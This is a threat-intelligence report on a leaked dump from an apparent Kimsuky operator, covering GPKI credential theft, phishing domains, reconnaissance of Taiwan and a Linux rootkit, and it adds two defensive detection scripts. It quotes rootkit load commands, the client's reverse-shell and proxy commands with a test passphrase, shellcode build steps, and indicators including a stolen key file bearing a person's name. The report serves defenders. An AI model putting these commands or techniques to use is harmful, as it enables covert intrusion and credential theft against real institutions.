Inside the Kimsuky Leak: How the “Kim” Dump Exposed North Korea’s Credential Theft Playbook

A rare and revealing breach attributed to a North Korean-affiliated actor, known only as “Kim” as named by the hackers who dumped the data, has delivered a new insight into Kimsuky (APT43) tactics, techniques, and infrastructure. This actor's operational profile showcases credential-focused intrusions targeting South Korean and Taiwanese networks, with a blending of Chinese-language tooling, infrastructure, and possible logistical support. The “Kim” dump, which includes bash histories, phishing domains, OCR workflows, compiled stagers, and rootkit evidence, reflects a hybrid operation situated between DPRK attribution and Chinese resource utilization.

Contents:
Part I: Technical Analysis
Part II: Goals Analysis
Part III: Threat Intelligence Report

Executive Summary


Screen shot of the adversary’s desktop VM

This report is broken down into three parts: 

  • Technical Analysis of the dump materials
  • Motivation and Goals of the APT actor (group)
  • A CTI report compartment for analysts

While this leak only gives a partial idea of what the Kimsuky/PRC activities have been, the material provides insight into the expansion of activities, the nature of the actor(s), and the goals they have in their penetration of South Korean governmental systems that would benefit not only the DPRK, but also the PRC.

Phrack article

Without a doubt, there will be more coming out from this dump in the future, particularly if the burned assets have not been taken offline and access is still available, or if others have cloned those assets for further analysis. We may revisit this in the future if additional novel information comes to light.

Part I: Technical Analysis

The Leak at a Glance

The leaked dataset attributed to the “Kim” operator offers a uniquely operational perspective into North Korean-aligned cyber operations. Among the contents were terminal history files revealing active malware development efforts using NASM (Netwide Assembler), a choice consistent with low-level shellcode engineering typically reserved for custom loaders and injection tools. These logs were not static forensic artifacts but active command-line histories showing iterative compilation and cleanup processes, suggesting a hands-on attacker directly involved in tool assembly.

File list of dump

In parallel, the operator ran OCR (Optical Character Recognition) commands against sensitive Korean PDF documents related to public key infrastructure (PKI) standards and VPN deployments. These actions likely aimed to extract structured language or configurations for use in spoofing, credential forgery, or internal tool emulation.

Privileged Access Management (PAM) logs also surfaced in the dump, detailing a timeline of password changes and administrative account use. Many were tagged with the Korean string 변경완료 (“change complete”), and the logs included repeated references to elevated accounts such as oracle, svradmin, and app_adm01, indicating sustained access to critical systems.

The phishing infrastructure was extensive. Domain telemetry pointed to a network of malicious sites designed to mimic legitimate Korean government portals. Sites like nid-security[.]com were crafted to fool users into handing over credentials via advanced AiTM (Adversary-in-the-Middle) techniques.

nid-security[.]com phishing domain (anon reg 2024)

Finally, network artifacts within the dump showed targeted reconnaissance of Taiwanese government and academic institutions. Specific IP addresses and .tw domain access, along with attempts to crawl .git repositories, reveal a deliberate focus on high-value administrative and developer targets.

Perhaps most concerning was the inclusion of a Linux rootkit using syscall hooking (khook) and stealth persistence via directories like /usr/lib64/tracker-fs. This highlights a capability for deep system compromise and covert command-and-control operations, far beyond phishing and data theft.

Artifacts recovered from the dump include:

  • Terminal history files demonstrating malware compilation using NASM
  • OCR commands parsing Korean PDF documents related to PKI and VPN infrastructure
  • PAM logs reflecting password changes and credential lifecycle events
  • Phishing infrastructure mimicking Korean government sites
  • IP addresses indicating reconnaissance of Taiwanese government and research institutions
  • Linux rootkit code using syscall hooking and covert channel deployment

Credential Theft Focus

The dump strongly emphasizes credential harvesting as a central operational goal. A key file, 136백운규001_env.key, is a smoking-gun indicator of stolen South Korean Government PKI material: its structure (numeric ID + Korean name + .key) aligns uniquely with SK GPKI issuance practices and provides clear evidence of compromised, identity-tied state cryptographic keys. It was discovered alongside plaintext passwords, which indicates active compromise of South Korea’s GPKI (Government Public Key Infrastructure). Possession of such certificates would allow for highly effective identity spoofing across government systems.

PAM logs further confirmed this focus, showing a pattern of administrative account rotation and password resets, all timestamped and labeled with success indicators (변경완료: Change Complete). The accounts affected were not low-privilege; instead, usernames like oracle, svradmin, and app_adm01, often used by IT staff and infrastructure services, suggested access to core backend environments.

These findings point to a strategy centered on capturing and maintaining access to privileged credentials and digital certificates, effectively allowing the attacker to act as an insider within trusted systems.

  • Leaked .key files (e.g., 136백운규001_env.key) with plaintext passwords confirm access to GPKI systems
  • PAM logs show administrative password rotations tagged with 변경완료 (change complete)
  • Admin-level accounts such as oracle, svradmin, and app_adm01 repeatedly appear in compromised logs

Phishing Infrastructure

The operator’s phishing infrastructure was both expansive and regionally tailored. Domains such as nid-security[.]com and webcloud-notice[.]com mimicked Korean identity and document delivery services, likely designed to intercept user logins or deploy malicious payloads. More sophisticated spoofing was seen in sites that emulated official government agencies like dcc.mil[.]kr, spo.go[.]kr, and mofa.go[.]kr.

Whois of domains created by dysoni91@tutamail[.]com
Historical Whois of webcloud-notice[.]com

Burner email usage added another layer of operational tradecraft. The address jeder97271[@]wuzak[.]com is likely linked to phishing kits that operated through TLS proxies, capturing credentials in real time as victims interacted with spoofed login forms.

These tactics align with previously known Kimsuky behaviors but also demonstrate an evolution in technical implementation, particularly the use of AiTM interception rather than relying solely on credential-harvesting documents.

Domain connections map
  • Domains include: nid-security[.]com, html-load[.]com, webcloud-notice[.]com, koala-app[.]com, and wuzak[.]com
  • Mimicked portals: dcc.mil[.]kr, spo.go[.]kr, mofa.go[.]kr
  • Burner email evidence: jeder97271[@]wuzak[.]com
  • Phishing kits leveraged TLS proxies for AiTM credential capture

Malware Development Activity

Kim’s malware development environment showcased a highly manual, tailored approach. Shellcode was compiled using NASM, specifically with flags like -f win32, revealing a focus on targeting Windows environments. Commands such as make and rm were used to automate and sanitize builds, while hashed API call resolution (VirtualAlloc, HttpSendRequestA, etc.) was implemented to evade antivirus heuristics.

The dump also revealed reliance on GitHub repositories known for offensive tooling. TitanLdr, minbeacon, Blacklotus, and CobaltStrike-Auto-Keystore were all cloned or referenced in command logs. This hybrid use of public frameworks for private malware assembly is consistent with modern APT workflows.

A notable technical indicator was the use of the proxyres library to extract Windows proxy settings, particularly via functions like proxy_config_win_get_auto_config_url. This suggests an interest in hijacking or bypassing network-level security controls within enterprise environments.

  • Manual shellcode compilation via nasm -f win32 source/asm/x86/start.asm
  • Use of make, rm, and hash obfuscation of Win32 API calls (e.g., VirtualAlloc, HttpSendRequestA)
  • GitHub tools in use: TitanLdr, minbeacon, Blacklotus, CobaltStrike-Auto-Keystore
  • Proxy configuration probing through proxyres library (proxy_config_win_get_auto_config_url)

Rootkit Toolkit and Implant Structure

The Kim dump offers deep insight into a stealthy and modular Linux rootkit attributed to the operator’s post-compromise persistence tactics. The core implant, identified as vmmisc.ko (alternatively VMmisc.ko in some shells), was designed for kernel-mode deployment across multiple x86_64 Linux distributions and utilizes classic syscall hooking and covert channeling to maintain long-term undetected access.

Google Translation of Koh doc: Rootkit Endpoint Reuse Authentication Tool

“This tool uses kernel-level rootkit hiding technology, providing a high degree of stealth and penetration connection capability. It can hide while running on common Linux systems, and at the kernel layer supports connection forwarding, allowing reuse of external ports to connect to controlled hosts. Its communication behavior is hidden within normal traffic.

The tool uses binary merging technology: at compile time, the application layer program is encrypted and fused into a .ko driver file. When installed, only the .ko file exists. When the .ko driver starts, it will automatically decompress and release the hidden application-layer program.

Tools like chkrootkit, rkhunter, and management utilities (such as ps, netstat, etc.) are bypassed through technical evasion and hiding, making them unable to detect hidden networks, ports, processes, or file information.

To ensure software stability, all functions have also passed stress testing.

Supported systems: Linux Kernel 2.6.x / 3.x / 4.x, both x32 and x64 systems”.

Implant Features and Behavior

This rootkit exhibits several advanced features:

  • Syscall Hooking: Hooks critical kernel functions (e.g., getdents, read, write) to hide files, directories, and processes by name or PID.
  • SOCKS5 Proxy: Integrated remote networking capability using dynamic port forwarding and chained routing.
  • PTY Backdoor Shell: Spawns pseudoterminals that operate as interactive reverse shells with password protection.
  • Encrypted Sessions: Session commands must match a pre-set passphrase (e.g., testtest) to activate rootkit control mode.

Once installed (typically using insmod vmmisc.ko), the rootkit listens silently and allows manipulation via an associated client binary found in the dump. The client supports an extensive set of interactive commands, including:

+p                 # list hidden processes
+f                 # list hidden files
callrk             # load client ↔ kernel handshake
exitrk             # gracefully unload implant
shell              # spawn reverse shell
socks5             # initiate proxy channel
upload / download  # file transfer interface

These capabilities align closely with known DPRK malware behaviors, particularly from the Kimsuky and Lazarus groups, who have historically leveraged rootkits for lateral movement, stealth, persistence, and exfiltration staging.

Observed Deployment

Terminal history (.bash_history) shows the implant was staged and tested from the following paths:

.cache/vmware/drag_and_drop/VMmisc.ko
/usr/lib64/tracker-fs/vmmisc.ko

Execution logs show the use of commands such as:

insmod /usr/lib64/tracker-fs/vmmisc.ko
./client 192.168.0[.]39 testtest

These paths were not random—they mimic legitimate system service locations to avoid detection by file integrity monitoring (FIM) tools.

Deployment map

This structure highlights the modular, command-activated nature of the implant and its ability to serve multiple post-exploitation roles while maintaining stealth through kernel-layer masking.
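A defender-side check for the hiding behaviour described above (a getdents hook that filters directory listings), written as an added example rather than anything from the dump: a direct stat of /proc/<pid> or of a staging path such as /usr/lib64/tracker-fs/vmmisc.ko still succeeds even when the name is filtered out of the listing, so comparing the two views exposes the hook. The Tgid filter and the before/after listings handle the two classic false positives (threads, and processes that start or exit mid-scan); all paths and names beyond those on the page are assumptions.

```python
import os
import tempfile

PROC = "/proc"


def listed_pids(proc=PROC):
    """PIDs visible through a directory listing, the path a getdents hook filters."""
    return {int(n) for n in os.listdir(proc) if n.isdigit()}


def is_thread_group_leader(pid, proc=PROC):
    """Threads also own /proc/<tid> directories that readdir never enumerates,
    so a bare probe would report every thread as hidden. Only count a PID
    whose Tgid equals itself (the same filter the unhide tool applies)."""
    try:
        with open(os.path.join(proc, str(pid), "status")) as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return False
    return False


def probed_pids(max_pid, proc=PROC):
    """PIDs found by stat-ing each /proc/<pid> directly: a hook that filters
    getdents alone does not stop a direct path lookup from succeeding."""
    found = set()
    for pid in range(1, max_pid + 1):
        if os.path.isdir(os.path.join(proc, str(pid))) and is_thread_group_leader(pid, proc):
            found.add(pid)
    return found


def hidden_pids(listed, probed):
    """Pure comparison, kept separate so the logic is checkable on constructed sets."""
    return sorted(set(probed) - set(listed))


def scan_processes(max_pid=None, proc=PROC):
    """Full scan (one stat per candidate PID up to pid_max, so it takes seconds).
    Listing before and after the probe absorbs processes that start or exit
    mid-scan: only PIDs absent from both listings are reported."""
    if max_pid is None:
        with open(os.path.join(proc, "sys/kernel/pid_max")) as fh:
            max_pid = int(fh.read())
    before = listed_pids(proc)
    probed = probed_pids(max_pid, proc)
    after = listed_pids(proc)
    return hidden_pids(before | after, probed)


def hidden_entry(path):
    """A path that stat() resolves but whose name is missing from its parent's
    listing is the file-side signature of the same getdents hook."""
    path = os.path.abspath(path)
    parent, name = os.path.split(path)
    if not name:
        return False
    try:
        os.stat(path)
    except FileNotFoundError:
        return False
    return name not in os.listdir(parent)


def selfcheck():
    """Confirm the file check reports a freshly created, visible temp file as not hidden."""
    with tempfile.NamedTemporaryFile() as tmp:
        return hidden_entry(tmp.name) is False


if __name__ == "__main__":
    # Paths the report says the implant was staged from.
    for p in ("/usr/lib64/tracker-fs", "/usr/lib64/tracker-fs/vmmisc.ko"):
        print(p, "HIDDEN" if hidden_entry(p) else "not hidden / absent")
    print("hidden pids:", scan_processes())
```

A rootkit that also hooks stat or openat for its own paths defeats this comparison; in that case the remaining offline check is mounting the disk from a trusted boot medium.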

Strategic Implications

The presence of such an advanced toolkit in the “Kim” dump strongly suggests the actor had persistent access to Linux server environments, likely via credential compromise. The use of kernel-mode implants also indicates long-term intent and trust-based privilege escalation. The implant's pathing, language patterns, and tactics (e.g., use of /tracker-fs/, use of test passwords) match TTPs previously observed in operations attributed to Kimsuky, enhancing confidence in North Korean origin.

OCR-Based Recon

A defining component of Kim’s tradecraft was the use of OCR to analyze Korean-language security documentation. The attacker issued commands such as ocrmypdf -l kor+eng "file.pdf" to parse documents like (별지2)행정전자서명_기술요건_141125.pdf (“(Appendix 2) Administrative Electronic Signature_Technical Requirements_141125.pdf”) and SecuwaySSL U_카달로그.pdf (“SecuwaySSL U_Catalog.pdf”). These files contain technical language around digital signatures, SSL implementations, and identity verification standards used in South Korea’s PKI infrastructure.

This OCR-based collection approach indicates more than passive intelligence gathering - it reflects a deliberate effort to model and potentially clone government-grade authentication systems. The use of bilingual OCR (Korean + English) further confirms the operator’s intention to extract usable configuration data across documentation types.

OCR run on Korean PDFs
  • OCR commands used to extract Korean PKI policy language from PDFs such as (별지2)행정전자서명_기술요건_141125.pdf and SecuwaySSL U_카달로그.pdf
    • (별지2)행정전자서명_기술요건_141125.pdf → (Appendix 2) Administrative Electronic Signature_Technical Requirements_141125.pdf
    • SecuwaySSL U_카달로그.pdf → SecuwaySSL U_Catalog.pdf
  • Command example: ocrmypdf -l kor+eng "file.pdf"

SSH and Log-Based Evidence

The forensic evidence contained within the logs, specifically SSH authentication records and PAM outputs, provides clear technical confirmation of the operator’s tactics and target focus.

Several IP addresses stood out as sources of brute-force login attempts. These include 23.95.213[.]210 (a known VPS provider used in past credential-stuffing campaigns), 218.92.0[.]210 (allocated to a Chinese ISP), and 122.114.233[.]77 (Henan Mobile, China). These IPs were recorded during multiple failed login events, strongly suggesting automated password attacks against exposed SSH services. Their geographic distribution and known history in malicious infrastructure usage point to an external staging environment, possibly used for pivoting into Korean and Taiwanese systems.

Beyond brute force, the logs also contain evidence of authentication infrastructure reconnaissance. Multiple PAM and OCSP (Online Certificate Status Protocol) errors referenced South Korea’s national PKI authority, including domains like gva.gpki.go[.]kr and ivs.gpki.go[.]kr. These errors appear during scripted or automated access attempts, indicating a potential strategy of credential replay or certificate misuse against GPKI endpoints, an approach that aligns with Kim’s broader PKI-targeting operations.

Perhaps the most revealing detail was the presence of successful superuser logins labeled with the Korean term 최고 관리자 (“Super Administrator”). This suggests the actor was not just harvesting credentials but successfully leveraging them for privileged access, possibly through cracked accounts, reused credentials, or insider-sourced passwords. The presence of such accounts in conjunction with password rotation entries marked as 변경완료 (“change complete”) further implies active control over PAM-protected systems during the operational window captured in the dump.

Together, these logs demonstrate a methodical campaign combining external brute-force access, PKI service probing, and administrative credential takeover, a sequence tailored for persistent infiltration and lateral movement within sensitive government and enterprise networks.

Brute force mapping
  • Brute-force IPs: 23.95.213[.]210, 218.92.0[.]210, 122.114.233[.]77
IP Address          Origin                     Role / Threat Context
218.92.0[.]210      China Telecom (Jiangsu)    Part of Chinanet backbone, likely proxy or scanning node
23.95.213[.]210     Colocrossing (US)          Frequently used in brute-force and anonymized hosting for malware ops
122.114.233[.]77    Presumed PRC local ISP     Possibly mobile/ISP-based proxy used to obfuscate lateral movement
  • PAM/OCSP errors targeting gva.gpki.go[.]kr, ivs.gpki.go[.]kr
  • Superuser login events under 최고 관리자 (Super Administrator)
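The log indicators from this section and from Credential Theft Focus (failed SSH logins clustered by source, 변경완료 rotations of privileged accounts, 최고 관리자 logins, OCSP errors naming gpki.go.kr endpoints) lend themselves to a single triage pass. The script below is an added example, not tooling from the dump or the report; the sample lines are constructed, and the pam-audit and webapp line formats are assumptions standing in for whatever a given host actually emits.

```python
import json
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not lines from the dump) in the shapes the
# report describes: sshd failures from the three brute-force sources, PAM
# password rotations tagged 변경완료, a 최고 관리자 login and an OCSP error
# naming a GPKI endpoint. The pam-audit/webapp formats are assumptions.
SAMPLE_LOG = """\
Mar 03 02:11:04 srv01 sshd[2101]: Failed password for root from 218.92.0.210 port 41022 ssh2
Mar 03 02:11:06 srv01 sshd[2101]: Failed password for root from 218.92.0.210 port 41023 ssh2
Mar 03 02:11:09 srv01 sshd[2103]: Failed password for invalid user admin from 218.92.0.210 port 41030 ssh2
Mar 03 02:11:12 srv01 sshd[2105]: Failed password for oracle from 23.95.213.210 port 50212 ssh2
Mar 03 02:11:15 srv01 sshd[2105]: Failed password for oracle from 23.95.213.210 port 50213 ssh2
Mar 03 02:11:18 srv01 sshd[2106]: Failed password for svradmin from 23.95.213.210 port 50214 ssh2
Mar 03 02:11:20 srv01 sshd[2107]: Failed password for svradmin from 122.114.233.77 port 33010 ssh2
Mar 03 02:20:01 srv01 sshd[2200]: Accepted password for app_adm01 from 10.20.0.15 port 52001 ssh2
Mar 03 02:21:44 srv01 pam-audit: user=svradmin action=passwd status=변경완료 by=app_adm01
Mar 03 02:22:10 srv01 pam-audit: user=oracle action=passwd status=변경완료 by=app_adm01
Mar 03 02:23:05 srv01 pam-audit: user=jdoe action=passwd status=변경완료 by=jdoe
Mar 03 02:25:30 srv01 webapp: login role="최고 관리자" user=app_adm01 src=10.20.0.15
Mar 03 02:31:02 srv01 webapp: OCSP error: no response from ivs.gpki.go.kr (timeout)
Mar 03 03:00:00 srv01 sshd[2300]: Failed password for bob from 10.20.0.99 port 40001 ssh2
"""

# Privileged account names the report says recur in the compromised logs.
PRIVILEGED = {"oracle", "svradmin", "app_adm01", "unwadm", "root"}

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\d+(?:\.\d+){3})")
ROTATE_RE = re.compile(r"user=(\S+) action=passwd status=변경완료")
SUPER_RE = re.compile(r'role="최고 관리자" user=(\S+)')
GPKI_RE = re.compile(r"OCSP error:.*?\b([\w-]+\.gpki\.go\.kr)")


def triage(log_text, fail_threshold=3):
    """Group the indicators the leak describes into one findings dict."""
    fails = Counter()
    fail_users = defaultdict(set)
    rotations, super_logins, gpki_errors = [], [], []
    for line in log_text.splitlines():
        if m := FAILED_RE.search(line):
            user, ip = m.groups()
            fails[ip] += 1
            fail_users[ip].add(user)
        elif m := ROTATE_RE.search(line):
            rotations.append(m.group(1))
        elif m := SUPER_RE.search(line):
            super_logins.append(m.group(1))
        elif m := GPKI_RE.search(line):
            gpki_errors.append(m.group(1))
    return {
        # sources with repeated failures, and which accounts they tried
        "brute_force": {
            ip: {"failures": n, "users": sorted(fail_users[ip])}
            for ip, n in fails.items() if n >= fail_threshold
        },
        # 변경완료 rotations of privileged accounts only; an ordinary user
        # changing their own password (jdoe above) is routine and is dropped
        "privileged_rotations": [u for u in rotations if u in PRIVILEGED],
        "super_admin_logins": super_logins,
        "gpki_ocsp_errors": gpki_errors,
    }


def score(findings):
    """Crude priority: external brute force followed by privileged rotation on
    the same host is the takeover sequence the report describes."""
    if findings["brute_force"] and findings["privileged_rotations"]:
        return "high"
    if findings["privileged_rotations"] or findings["super_admin_logins"]:
        return "medium"
    return "low"


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    print(json.dumps(found, ensure_ascii=False, indent=2))
    print("priority:", score(found))
```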

Part II: Goals Analysis

Targeting South Korea: Identity, Infrastructure, and Credential Theft

The “Kim” operator’s campaign against South Korea was deliberate and strategic, aiming to infiltrate the nation’s digital trust infrastructure at multiple levels. A central focus was the Government Public Key Infrastructure (GPKI), where the attacker exfiltrated certificate files, including .key and .crt formats, some with plaintext passwords, and attempted repeated authentication against domains like gva.gpki.go[.]kr and ivs.gpki.go[.]kr. OCR tools were used to parse Korean technical documents detailing PKI and VPN architectures, demonstrating a sophisticated effort to understand and potentially subvert national identity frameworks. These efforts were not limited to reconnaissance; administrative password changes were logged, and phishing kits targeted military and diplomatic webmail, including clones of mofa.go[.]kr and credential harvesting through adversary-in-the-middle (AiTM) proxy setups.

Attempts at user account authentication
Servlet requests for KR domains

Beyond authentication systems, Kim targeted privileged accounts (oracle, unwadm, svradmin) and rotated credentials to maintain persistent administrative access, as evidenced by PAM and SSH logs showing elevated user activity under the title 최고 관리자 (“Super Administrator”). The actor also showed interest in bypassing VPN controls, parsing SecuwaySSL configurations for exploitation potential, and deployed custom Linux rootkits using syscall hooking to establish covert persistence on compromised machines. Taken together, the dump reveals a threat actor deeply invested in credential dominance, policy reconnaissance, and system-level infiltration, placing South Korea’s public sector identity systems, administrative infrastructure, and secure communications at the core of its long-term espionage objectives.

Taiwan Reconnaissance

Among the most notable aspects of the “Kim” leak is the operator’s deliberate focus on Taiwanese infrastructure. The attacker accessed a number of domains with clear affiliations to the island’s public and private sectors, including tw.systexcloud[.]com (linked to enterprise cloud solutions), mlogin.mdfapps[.]com (a mobile authentication or enterprise login portal), and the .git/ directory of caa.org[.]tw, which belongs to the Chinese Institute of Aeronautics, a government-adjacent research entity.

This last domain is especially telling. Accessing .git/ paths directly implies an attempt to enumerate internal source code repositories, a tactic often used to discover hardcoded secrets, API keys, deployment scripts, or developer credentials inadvertently exposed via misconfigured web servers. This behavior points to more technical depth than simple phishing; it indicates supply chain reconnaissance and long-term infiltration planning.

Taiwanese target map

The associated IP addresses further reinforce this conclusion. All three, 163.29.3[.]119, 118.163.30[.]45, and 59.125.159[.]81, are registered to academic, government, or research backbone providers in Taiwan. These are not random scans; they reflect targeted probing of strategic digital assets.

Summary of Whois & Ownership Insights

  • 118.163.30[.]45
  • 163.29.3[.]119
    • Falls within the 163.29.3[.]0/24 subnet identified with Taiwanese government or institutional use, notably in Taipei. This corresponds to B-class subnets assigned to public/government entities (source: IP address listing, Traditional Chinese).
  • 59.125.159[.]81
    • Belongs to the broader 59.125.159[.]0–59.125.159[.]254 block, commonly used by Taiwanese ISP operators such as Chunghwa Telecom in Taipei

Taken together, this Taiwan-focused activity reveals an expanded operational mandate. Whether the attacker is purely DPRK-aligned or operating within a DPRK–PRC fusion cell, the intent is clear: compromise administrative and developer infrastructure in Taiwan, likely in preparation for broader credential theft, espionage, or disruption campaigns.

  • Targeted domains: tw.systexcloud[.]com, caa.org[.]tw/.git/, mlogin.mdfapps[.]com
  • IPs linked to Taiwanese academic/government assets: 163.29.3[.]119, 118.163.30[.]45, 59.125.159[.]81
  • Git crawling suggests interest in developer secrets or exposed tokens

Hybrid Attribution Model

The “Kim” operator embodies the growing complexity of modern nation-state attribution, where cyber activities often blur traditional boundaries and merge capabilities across geopolitical spheres. This case reveals strong indicators of both North Korean origin and Chinese operational entanglement, presenting a textbook example of a hybrid APT model.

On one hand, the technical and linguistic evidence strongly supports a DPRK-native operator. Terminal environments, OCR parsing routines, and system artifacts consistently leverage Korean language and character sets. The operator’s activities reflect a deep understanding of Korean PKI systems, with targeted extraction of GPKI .key files and automation to parse sensitive Korean government PDF documentation. These are hallmarks of Kimsuky/APT43 operations, known for credential-focused espionage against South Korean institutions and diplomatic targets. The intent to infiltrate identity infrastructure is consistent with North Korea’s historical targeting priorities. Notably, the system time zone on Kim's host machine was set to UTC+9 (Pyongyang Standard Time), reinforcing the theory that the actor maintains direct ties to the DPRK’s internal environment, even if operating remotely.

However, this actor’s digital footprint extends well into Chinese infrastructure. Browser and download logs reveal frequent interaction with platforms like gitee[.]com, baidu[.]com, and zhihu[.]com, highly popular within the PRC but unusual for DPRK operators who typically minimize exposure to foreign services. Moreover, session logs include simplified Chinese content and PRC browsing behaviors, suggesting that the actor may be physically operating within China or through Chinese-language systems. This aligns with longstanding intelligence on North Korean cyber operators stationed in Chinese border cities such as Shenyang and Dandong, where DPRK nationals often conduct cyber operations with tacit approval or logistical consent from Chinese authorities. These locations provide higher-speed internet, relaxed oversight, and convenient geopolitical proximity.

Browser History viewing Taiwanese and Chinese sites

The targeting of Taiwanese infrastructure further complicates attribution. Kimsuky has not historically prioritized Taiwan, yet in this case, the actor demonstrated direct reconnaissance of Taiwanese government and developer networks. While this overlaps with Chinese APT priorities, recent evidence from the “Kim” dump, including analysis of phishing kits and credential theft workflows, suggests this activity was likely performed by a DPRK actor exploring broader regional interests, possibly in alignment with Chinese strategic goals. Researchers have noted that Kimsuky operators have recently asked questions in phishing lures related to potential Chinese-Taiwanese conflicts, implying interest beyond the Korean peninsula.

Some tooling overlaps with PRC-linked APTs, particularly GitHub-based stagers and proxy-resolving modules, but these are not uncommon in the open-source malware ecosystem and may reflect opportunistic reuse rather than deliberate mimicry.

IMINT Analysis: Visual Tradecraft and Cultural Camouflage

A review of image artifacts linked to the "Kim" actor reveals a deliberate and calculated use of Chinese social and technological visual content as part of their operational persona. These images, extracted from browser history and uploads attributed to the actor, demonstrate both strategic alignment with DPRK priorities and active cultural camouflage within the PRC digital ecosystem.

Uploads of images by Kim found in browser history
Images downloaded from aixfan[.]com

The visual set includes promotional graphics for Honor smartphones, SoC chipset evolution charts, Weibo posts featuring vehicle registration certificates, meme-based sarcasm, and lifestyle imagery typical of Chinese internet users. Notably, the content is exclusively rendered in simplified Chinese, reinforcing prior assessments that the operator either resides within mainland China or maintains a working digital identity embedded in Chinese platforms. Devices and services referenced, such as Xiaomi phones, Zhihu, Weibo, and Baidu, suggest intimate familiarity with PRC user environments.

Operationally, this behavior achieves two goals. First, it enables the actor to blend in seamlessly with native PRC user activity, which complicates attribution and helps bypass platform moderation or behavioral anomaly detection. Second, the content itself may serve as bait or credibility scaffolding (a framework that creates an illusion of trust and so eases compromise) in phishing and social engineering campaigns, especially those targeting developers or technical users on Chinese-language platforms.

Some images, such as the detailed chipset timelines and VPN or device certification posts, suggest a continued interest in supply chain reconnaissance and endpoint profiling—both tradecraft hallmarks of Kimsuky and similar APT units. Simultaneously, meme humor, sarcastic overlays, and visual metaphors (e.g., the “Kaiju’s tail is showing” idiom) indicate the actor’s fluency in PRC netizen culture and possible mockery of operational security breaches—whether their own or others’.

Taken together, this IMINT corpus supports the broader attribution model: a DPRK-origin operator embedded, physically or virtually, within the PRC, leveraging local infrastructure and social platforms to facilitate long-term campaigns against South Korea, Taiwan, and other regional targets while maintaining cultural and technical deniability.

Attribution Scenarios:

  • Option A: DPRK Operator Embedded in PRC
    • Use of Korean language, OCR targeting of Korean documents, and focus on GPKI systems strongly suggest North Korean origin.
    • Use of PRC infrastructure (e.g., Baidu, Gitee) and simplified Chinese content implies the operator is physically located in China or benefits from access to Chinese internet infrastructure.
  • Option B: PRC Operator Emulating DPRK
    • Taiwan-focused reconnaissance aligns with PRC cyber priorities.
    • Use of open-source tooling and phishing methods shared with PRC APTs could indicate tactical emulation.

The preponderance of evidence supports the hypothesis that “Kim” is a North Korean cyber operator embedded in China or collaborating with PRC infrastructure providers. This operational model allows the DPRK to amplify its reach, mask attribution, and adopt regional targeting strategies beyond South Korea, particularly toward Taiwan. As this hybrid model matures, it reflects the strategic adaptation of DPRK-aligned threat actors who exploit the permissive digital environment of Chinese networks to evade detection and expand their operational playbook.

Targeting Profiles

The “Kim” leak provides one of the clearest windows to date into the role-specific targeting preferences of the operator, revealing a deliberate focus on system administrators, credential issuers, and backend developers, particularly in South Korea and Taiwan.

In South Korea, the operator’s interest centers around PKI administrators and infrastructure engineers. The recovered OCR commands were used to extract technical details from PDF documents outlining Korea’s digital signature protocols, such as identity verification, certificate validation, and encrypted communications, components that form the backbone of Korea’s secure authentication systems. The goal appears to be not only credential theft but full understanding and potential replication of government-trusted PKI procedures. This level of targeting suggests a strategic intent to penetrate deeply trusted systems, potentially for use in later spoofing or identity masquerading operations.

PKI attack targets

In Taiwan, the operator shifted focus to developer infrastructure and cloud access portals. Specific domains accessed, like caa.org[.]tw/.git/, indicate attempts to enumerate internal repositories, most likely to discover hardcoded secrets, authentication tokens, or deployment keys. This is a classic supply chain targeting method, aiming to access downstream systems via compromised developer credentials or misconfigured services.

Additional activity pointed to interaction with cloud service login panels such as tw.systexcloud[.]com and mlogin.mdfapps[.]com. These suggest an attempt to breach centralized authentication systems or identity providers, granting the actor broader access into enterprise or government networks with a single credential set.

Taken together, these targeting profiles reflect a clear emphasis on identity providers, backend engineers, and those with access to system-level secrets. This reinforces the broader theme of the dump: persistent, credential-first intrusion strategies, augmented by reconnaissance of authentication standards, key management policies, and endpoint development infrastructure.

South Korean:

  • PKI admins, infrastructure engineers
  • OCR focus on Korean identity standards

Taiwanese:

  • Developer endpoints and internal .git/ repos
  • Access to cloud panels and login gateways

Final Assessment

The “Kim” leak represents one of the most comprehensive and technically intimate disclosures ever associated with Kimsuky (APT43) or its adjacent operators. It not only reaffirms known tactics (credential theft, phishing, and PKI compromise) but exposes the inner workings of the operator’s environment, tradecraft, and operational intent in ways rarely observed outside of active forensic investigations.

At the core of the leak is a technically competent actor, well-versed in low-level shellcode development, Linux-based persistence mechanisms, and certificate infrastructure abuse. Their use of NASM, API hashing, and rootkit deployment points to custom malware authorship. Furthermore, the presence of parsed government-issued Korean PDFs, combined with OCR automation, shows not just opportunistic data collection but a concerted effort to model, mimic, or break state-level identity systems, particularly South Korea's GPKI.

The operator’s cultural and linguistic fluency in Korean, and their targeting of administrative and privileged systems across South Korean institutions, support a high-confidence attribution to a DPRK-native threat actor. However, the extensive use of Chinese platforms like gitee[.]com, Baidu, and Zhihu, and Chinese infrastructure for both malware hosting and browsing activity reveals a geographical pivot or collaboration: a hybrid APT footprint rooted in DPRK tradecraft but operating from or with Chinese support.

Most notably, this leak uncovers a geographical expansion of operational interest; the actor is no longer solely focused on the Korean peninsula. The targeting of Taiwanese developer portals, government research IPs, and .git/ repositories shows a broadened agenda that likely maps to both espionage and supply chain infiltration priorities. This places Taiwan, like South Korea, at the forefront of North Korean cyber interest, whether for intelligence gathering, credential hijacking, or as staging points for more complex campaigns.

The threat uncovered here is not merely malware or phishing; it is an infrastructure-centric, credential-first APT campaign that blends highly manual operations (e.g., hand-compiled shellcode, direct OCR of sensitive PDFs) with modern deception tactics such as AiTM phishing and TLS proxy abuse.

Organizations in Taiwan and South Korea, particularly those managing identity, certificate, and cloud access infrastructure, should consider themselves under persistent, credential-focused surveillance. Defensive strategies must prioritize detection of behavioral anomalies (e.g., use of OCR tools, GPKI access attempts), outbound communications with spoofed Korean domains, and the appearance of low-level toolchains like NASM or proxyres-based scanning utilities within developer or admin environments.

In short: the “Kim” actor embodies the evolution of nation-state cyber threats—a fusion of old-school persistence, credential abuse, and modern multi-jurisdictional staging. The threat is long-term, embedded, and adaptive.

Part III: Threat Intelligence Report

TLP WHITE:

Targeting Summary

The analysis of the “Kim” operator dump reveals a highly focused credential-theft and infrastructure-access campaign targeting high-value assets in both South Korea and Taiwan. Victims were selected based on their proximity to trusted authentication systems, administrative control panels, and development environments.

| Category | Details |
|---|---|
| Regions | South Korea, Taiwan |
| Targets | Government, Telecom, Enterprise IT |
